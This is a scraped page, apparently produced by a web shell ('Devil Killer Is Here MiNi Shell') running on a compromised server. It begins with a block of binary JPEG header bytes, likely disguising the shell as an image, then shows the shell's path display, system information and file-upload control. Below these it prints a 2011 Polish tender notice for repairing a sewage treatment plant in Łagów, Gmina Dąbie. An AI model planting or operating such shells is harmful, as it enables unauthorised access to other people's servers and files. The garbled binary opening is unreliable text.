JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111228/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111228/346019-N-2011.html

<p class="kh_header"><b>Dąbie: Remont Oczyszczalni Ścieków w Łagowie, Gmina Dąbie, powiat krośnieński, woj. lubuskie</b><br>
<b>Numer ogłoszenia: 346019 - 2011; data zamieszczenia: 28.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Dąbie , ul. Szeroka 4, 66-615 Dąbie, woj. lubuskie, tel. 068 3835148, faks 068 3832148.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dabie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont Oczyszczalni Ścieków w Łagowie, Gmina Dąbie, powiat krośnieński, woj. lubuskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A.OPIS TECHNICZNY wykonania zadania wg dokumentacji projektowej.
A.1 Opis przedsięwzięcia w języku niespecjalistycznym.
Przedmiotem opracowania jest projekt budowlany - część technologiczna - remontu oczyszczalni ścieków dla wsi Łagów. Celem przedmiotowego opracowania jest przedstawienie rozwiązań technologicznych remontu przedmiotowej oczyszczalni ścieków.
Oczyszczalnia ścieków dla wsi Łagów ( osiedle ) zlokalizowana jest w całości na działce o numerze ewidencyjnym 209/39.
Ciąg technologiczny do oczyszczania ścieków, zawierający obiekty i urządzenia do mechanicznego i biologicznego oczyszczania pozwoli na efektywną eliminację ze ścieków surowych części stałych oraz pełne, biologiczne oczyszczanie w reaktorze biologicznym typu SBR - SANOCLEAN 125.  Ścieki oczyszczone spełniać będą postanowienia obowiązujących przepisów prawnych.
Na terenie istniejącej oczyszczalni ścieków prowadzona będzie gospodarka odpadami ściekowymi. Zagospodarowane odpady wywożone będą z oczyszczalni w sposób zorganizowany i uzgodniony z podmiotami zajmującymi się zagospodarowaniem odpadów.
Ścieki oczyszczone odpływać będą z oczyszczalni SONOCLEAN 125 poprzez istniejący kanał o 250 do rowu melioracyjnego.
Przepustowość średniodobowa istniejącej oczyszczalni wynosi 18,0 m3/d.
Do ciągu technologicznego do oczyszczania ścieków spływać będą wyłącznie ścieki bytowe z zabudowań mieszkalnych z terenu wsi Łagów.  

A2. 	INFORMACJE OGÓLNE
A.2.1. 	    Lokalizacja projektowanej oczyszczalni ścieków 
Projektowany drugi ciąg technologiczny do oczyszczania ścieków jest zlokalizowany na działce 209/39. 
Ścieki oczyszczone odprowadzone są do istniejącego rowu.
Energia elektryczna jest doprowadzona do skrzynki elektrycznej zlokalizowanej na działce nr 209/309.
Działka nr 209/39 graniczy z działką nr 209/49.
Lokalizacja istniejącej oczyszczalni ścieków dla osiedla mieszkaniowego dla miejscowości Łagów jest usankcjonowana pozwoleniem na użytkowanie.
Stan formalno-prawny nieruchomości
 Prawo do dysponowania nieruchomością na cele budowlane, oznaczoną w ewidencji gruntów i budynków jako działka nr 209/39, w obrębie ewidencyjnym Łagów, w jednostce ewidencyjnej Gmina Dąbie, posiada Gmina Dąbie.

A.2.2 	Charakterystyka technologiczna i techniczna remontowanej oczyszczalni ścieków 
Oczyszczalnia ścieków składać się będzie z następujących obiektów technologicznych:
1.Komora krat z koszem - istniejąca
2.Pompownia ścieków surowych - istniejąca
3.Komora napowietrzania i osadnik wtórny - do wykorzystania w 2 etapie
4.Reaktor biologiczny SBR - nowy (w miejsce osadnika)
5.Stanowisko pomiarowe ścieków oczyszczonych - istniejące
6.Wylot ścieków oczyszczonych do odbiornika - istniejący

B.       ZAKRS PRAC DODATKOWYCH 
B.1 W związku z planowanym remontem oczyszczalni ścieków dodatkowo należy wykonać następujące prace:
-  wymienić odcinek kanalizacji wg rysunków,
-  wymienić przewód tłoczny do SRB,
-  wymienić pompy NURT 50 PZM 1,1/SZ-2 ( 2 szt. ) w przepompowni ścieków,
-  wymienić zestaw wodomierzowy o 15 wraz z zaworem wypływowym ?cala
-  wymienić dźwig o udźwigu 1,5 T z podnośnikiem elektrycznym,
-  odbudować boks na odpady stałe,
-  wykonać nowe przykrycia na studnie o średnicy 1230 mm z blachy nierdzewnej - zamykane dwustronnie - ( 6 szt. ),
-  wykonać nowe ogrodzenie i bramę wjazdową,
-  nowe skarpy obsiać trawą,
-  zasilić elektrycznie pompy SRB i dźwig,
B.2   Uwagi :
- Całość robót należy wykonywać zgodnie z Warunkami Technicznymi, część II - Instalacje Sanitarne i Przemysłowe oraz instrukcjami branżowymi.
- Wszystkie prace wykonywać pod fachowym nadzorem technicznym.
- W przypadku realizacji zadania etapami, kolejność i zakres wykonania sieci należy uzgodnić z projektantem.
- 	W przypadku stwierdzenia zbliżenia z kablami energetycznymi, należy na kable zamontować dwudzielne przepusty typu AROT o 110 mm.
- W trakcie robót ściśle przestrzegać aktualnych przepisów i zasad BHP dla wszystkich rodzajów robót
- Geodezyjne pomiary powykonawcze sieci i urządzeń wykonywać przed ich zasypaniem ziemia, zgodnie z Dz. U. Nr 183/91 poz. 376
- Po zakończeniu robót sieć i urządzenia poddać próbie ciśnieniowej 
(Pn-92/B-10735) oraz przepłukać
- Po zakończeniu robót przekazać użytkownikowi komplet dokumentacji projektowej z naniesionymi zmianami wprowadzonymi w trakcie wykonawstwa.

C. BRANŻA ELEKTRYCZNA  
C.1. Przedmiotem opracowania jest projekt budowlano-wykonawczy  zasilania elektrycznego remontowanej oczyszczalni ścieków na osiedlu w Łagowie Gm. Dąbie na dz. nr 209/39 stanowiącej część składową istniejącej  sieci kanalizacyjnej  na osiedlu domów wielorodzinnych w Łagowie Gm. Dąbie. Oczyszczalnia wraz z przyłączem  elektrycznym  zlokalizowana jest na dz. nr  209/39 należącej do Inwestora to jest Gminy Dąbie. 
C.2.   Zakres opracowania 
         Zakres opracowania obejmuje:
- Zasilanie ist. tablicy głównej TG
- Tablica główna TG
- Linie zasilające poszczególne urządzenia elektryczne na oczyszczalni
- Pompy w zbiorniku na ścieki
- Oświetlenie terenu oczyszczalni
- pomiar energii elektrycznej
- uziemienia
C.3.   Charakterystyka elektroenergetyczna
-   napięcie zasilania  3x400/230V
-   system sieci  TN-CS 
-   moc zainstalowana : Pi = 7840W
-   prąd zabezpieczenia  instalacji oczyszczalni  WT00/gG 32A w RBK00
C.4.    Opis rozwiązań projektowych
C.4.1. Zasilanie
           Zasilanie urządzeń technologicznych remontowanej oczyszczalni ścieków w Łagowie na dz. 209/39  należy wykonać jako całkowicie nowe , pozostawiając jedynie ist. linią kablową YKY 4x6mm2 (wewnętrzna linia zasilająca) z tablicy  administracyjnej osiedla w Łagowie do tablicy TG w budynku rozdzielni elektrycznej na terenie dz. 209/39. 
C.4.2.  Zasilanie ist. tablicy głównej TG
Na  dz. 209/39 w  Łagowie, znajduje się niewielki budynek w którym znajduje się 
tablica Głowna TG , która jest zasilana linia kablową YKY4x6mm2 z tablicy administracyjnej w jednym z budynków osiedla domów wielorodzinnych .
Mając na uwadze, że stan techniczny ist. linię kablową jest dobry, należy  pozostawić do wykorzystania zasilania wyremontowanej oczyszczalni, wraz z obudową ist. tablicy TG w budynku rozdzielni na terenie dz. 209/39.
Pozostałą część instalacji elektrycznej należy zdemontować i wymienić na nową , ze względu najej znaczne zużycie i bardzo zły stan techniczny przewodów , połączeń i zabezpieczeń.
C.4.3.  Tablica Głowna TG
Ist. w budynku rozdzielni elektrycznej tablicę główną TG należy wykorzystać (IP65).
W tym celu zdemontować z niej całą aparaturę , pozostawiając jedynie zamontowany na Drzwiczkach wyłącznik główny ŁUK 25. Zdemontować również umocowaną obok tablicę sterowniczą dotychczasowej oczyszczalni 
W dolnej części tablicy  TG zamontować rozłącznik bezpiecznikowy RBK00 z zabezpiecze- niami WT00/gG 32A. W górnej części zamocować dwie szyny TH35 , na których zamoco- wać aparaty elektryczne zgodnie ze schematem na rys, E2.i połączyć drutem LY 4mm2.. Ist. na zewnętrznych drzwiach rozłącznik ŁUK 25 należy połączyć przewodami LYg 6mm2 z zaciskami odejścowymi RBK00 (rys. E2),
Z tablicy TG wyprowadzić liniami kablowymi YKY o przekrojach podnych na rys. E1 i E2 , linie kablowe obwodów do urządzeń elektrycznych oczyszczalni.
C.4.4 Linie zasilające poszczególne urządzenia elektryczne na oczyszczalni.
Projektuje się wykonanie następujących  linii zasilających z tablicy TG::
1 - kablem YKY 5x4mm2 do zasilania wolno stojącej szafki sterowniczej , którą dostarczy
     dostawca urządzeń  technologicznych. 
2 - kablem YKY 4x2,5mm2 do zasilania ist. na podnośniku silnika elektrycznego ,
3 - dwoma kablami  YKY 4x2,5mm2 + YKY 2x2,5mm2 do zasilania i sterowania silnikami 
      pomp przepompowujących ścieki ze zbiornika 
4 - kablem YKY 3x2,5mm2 do zasilania lamp parkowych oświetlenia tereny oczyszczalni.
Kable ziemne  YKY ułożyć w rowach kablowych, przebiegających po trasach pokazanych na planie mapowym Rys. E1,  na głębokości 0,7m. na 10cm podsypce z piasku.
Linie kablowe prowadzić w ten sposób aby  zachować wymagane odległości od ist. urządzeń podziemnych zgodnie z Normą -SEP-E-004  Elektroenergetyczne , telekomunikacyjne i sygnalizacyjne linie kablowe -projektowanie i budowa. Kable co 10m. zaopatrzyć w oznaczniki Oki określające: typ kabla oraz relację i rok budowy.
Zasypanie kabli przeprowadzić w następujący sposób:
warstwa piasku 10cm
warstwa gruntu rodzimego 15cm
folia polietylenowa koloru niebieskiego gr. 0,5mm i szer. rowu kablowego
            -     grunt rodzimy ubijany warstwami
Po ukończeniu wykonać próby  pomontażowe oraz sprawdzić ciągłość żył linii kablowych.  
Kable  YKY 3x4mm2  połączyć z poszczególnymi urządzeniami elektrycznymi oczyszczalni, zgodnie z rys,, E2. 
C.4.5 Oświetlenie terenu oczyszczalni.
Projektuje się oświetlenie terenu oczyszczalni dwoma  lampami parkowymi na słupach 
parkowych S 4 (Elmonter Zagórów), z oprawami )P06G/S 70W/PC. Rozmieszczenie słupów pokazano na rys. E1.
Z tablicy TG z zabezpieczenia S 301B16A wyprowadzić kablem YKY 3x2,5mm2 do zewnętrznego automatu zmierzchowego AZ-106(16A) , umieszczonego na ścianie zewnętrznej budynku rozdzielni.. Z automatu AZ-106 wyprowadzić również kablem YKY 3x2,5mm2 linię kablową zasilania słupów oświetleniowych.SR4. Połaczenia w słupach wykonać na tabliczkach firmowych IZK z zabezpiecze- niem do każdej oprawy Wtz 6A. Ostatni słup uziemić ZP-12; R<10(omega).
Sterowanie oświetleniem poprzez automat zmierzchowy typu AZ-106 firmy Fi F.                                         
C.4.6  Pomiar energii elektrycznej
Pomiar energii elektrycznej dla wyremontowanej oczyszczalni  ścieków w Łagowie Gm. Dąbie na dz. 209/39 pozostawić istniejące  w tablicy administracyjnej budynku wielorodzinnego na osiedlu w Łagowie                                                                        
C.4.7.   Uziemienia
      Wykonać uziemienie szyny PEN  w tablicy TG i rozdzielić na zaciski: neutralny  N  i ochronny  PE .
C.4.8.   Ochrona od porażeń
         Jako ochronę podstawową stosować odpowiednie izolacje przewodów 750V i zastosowane przepisami odległości izolacyjne. Dodatkowo zastosowano obostrzoną ochronę p. porażeniową przez zastosowanie samoczynnego wyłączenia w ukł. TN-S .
C.4.9.  Uwagi końcowe
        Całość prac wykonać zgodnie z PBUE , obowiązującymi normami  PN-IEC 60364 oraz warunkami wykonania i odbioru robót budowlano-montażowych tom V.
Prace elektroinstalatorskie  i pomiarowe winna wykonać osoba o odpowiednich kwalifikacjach i uprawnieniach.
Wykonać odpowiednie pomiary rezystancji izolacji i działania ochron przeciwporażeniowych.

D.  Uwagi:
1) Jeżeli wystąpią nazwy własne producentów materiałów należy je traktować jako przykładowe.
2)Możliwe jest zastosowanie produktów innych firm pod warunkiem utrzymania założonych parametrów jakościowych.
3)W dokumentacji technicznej w przypadku wskazania znaków towarowych, patentów lub pochodzenia dodaje się wyrazy: lub równoważny.
4)Szczegółowy zakres, ilość, wyszczególnienie zawiera przedmiar robót, stanowiący integralną część niniejszej SIWZ z załącznikami. 

3. Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
4. Przedmiotem niniejszego postępowania nie jest zawarcie umowy ramowej.
5. Zamawiający nie dopuszcza możliwości udzielenia zamówień uzupełniających.
6. Informacja na temat możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom:
Wykonawca może powierzyć wykonanie części lub całości niniejszego zamówienia podwykonawcom. 
W takim przypadku zobowiązany jest do wykazania w formularzu ofertowym części zamówienia, której wykonanie zamierza powierzyć podwykonawcom.
Dodatkowe informacje na temat podwykonawców: 
Wykonawca odpowiada w pełni wobec Zamawiającego za czynności wykonane przez Podwykonawcę i jego personel oraz osoby z nim współpracujące.
7. Wymagania stawiane Wykonawcy:
7.1 Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia. 
7.2 Wymagana jest należyta staranność przy realizacji zobowiązań umowy, 
7.3 Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem wykonawcy. 
7.4 Określenie przez Wykonawcę telefonów kontaktowych i numerów fax. oraz innych ustaleń niezbędnych dla sprawnego i terminowego wykonania zamówienia. 
7.5 Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania przedmiotu zamówienia. 
7.6 Inne:
1) Wykonawca jest zobowiązany do inspekcji i przeprowadzenia badania placu budowy
i otoczenia w celu oszacowania na własną odpowiedzialność, na własny koszt ryzyko wszystkich danych, jakie mogą okazać się niezbędne do przygotowania oferty.
2) Cena ofert powinna obejmować koszty wykonania zamówienia (wraz z kosztami dodatkowymi wszelkich robót przygotowawczych, kosztami uzgodnień, delegacji, organizacji itp.)
3) Przy wyliczaniu ceny ofertowej Wykonawca ujmuje w cenach jednostkowych robót koszt prac:
a) zabezpieczenia robót pod względem BHP,
b) prace przygotowawcze i porządkowe w trakcie i po realizacji robót,
c) koszt energii elektrycznej i wody (w przypadku korzystania z zasobów zamawiającego) mimo 
nie podania ich w przedmiarze robót,
d) koszty ubezpieczenia.
9. Wymagania dot. Gwarancji: 
WYKONAWCA udziela gwarancji na wykonany przedmiot umowy przez okres 36 miesięcy, zgodnie z przepisami o gwarancji z art. 577-582 K.C., licząc od dnia odbioru końcowego i przedłuża termin rękojmi do 39 miesięcy, licząc od dnia odbioru końcowego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.33.00.00-9, 45.31.71.00-3, 45.31.11.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium 
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 5.000,00 złotych (słownie złotych: Pięć tysięcy 00/100).
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1)	w pieniądzu, przelewem na rachunek bankowy: nr 71 1020 5402 0000 0502 0027 8770 PKO BP o/Krosno Odrzańskie z adnotacją: wadium - ŁAGÓW Oczyszczalnia  -  przetarg,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3)	w gwarancjach bankowych, 
4)	w gwarancjach ubezpieczeniowych 
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275) w terminie składania ofert, sposób przekazania: w ofercie.

4. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
5. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
6. W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę spełnianie warunków udziału w zakresie potencjału technicznego oraz osób wykonawcy przez potwierdzenie w Oświadczeniu załączonym do oferty - załącznik nr 2.1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę spełnianie warunków udziału w zakresie potencjału technicznego oraz osób wykonawcy przez potwierdzenie w Oświadczeniu załączonym do oferty - załącznik nr 2.1 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę - załącznik nr 1 do SIWZ.A.4.) Kosztorys ofertowy. 2) Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych - załącznik nr 2.1 do SIWZ. 3) Dowód wniesienia wadium (jeżeli dotyczy). 4) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynikają  z przepisów prawa lub z przedstawionych dokumentów rejestrowych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności.
2.Dopuszcza się wprowadzanie zmian w treści umowy w zakresie: 
